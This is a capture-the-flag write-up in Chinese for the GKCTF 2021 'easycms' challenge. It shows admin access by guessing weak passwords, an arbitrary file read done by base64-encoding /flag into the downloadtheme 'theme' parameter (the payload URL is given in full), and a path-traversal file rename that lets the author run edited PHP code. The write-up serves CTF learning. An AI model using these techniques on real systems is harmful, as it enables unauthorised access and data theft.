[GKCTF 2021]easycms

[GKCTF 2021]easycms
URL加后缀admin.php进入登陆界面
题目提示了密码是五位弱口令，那就admin/admin或者admin/12345尝试


登录进去以后有两种方法
一. 任意文件下载
设计——自定义——导出主题——保存

下载下来的文件右键复制下载链接

http://cfc147be-ed41-45fc-a12f-672318d14a4f.node4.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMTIuemlw

最后是一串base64编码，解密后是/var/www/html/system/tmp/theme/default/12.zip而且是文件的绝对路径，我们直接包含/flag就可以了，base64加密一下成为L2ZsYWc=
payload：

http://cfc147be-ed41-45fc-a12f-672318d14a4f.node4.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=

二. 文件上传
设计——自定义——首页——编辑，选择php源代码


保存的时候要我先创建一个cksj文件，这个文件名是每个人不一样的。

设计——组件——素材库——上传素材

先上传一个txt文件然后编辑它的名称，改成…/…/…/…/…/system/tmp/cksj

然后回去编辑php代码

返回网站首页得到flag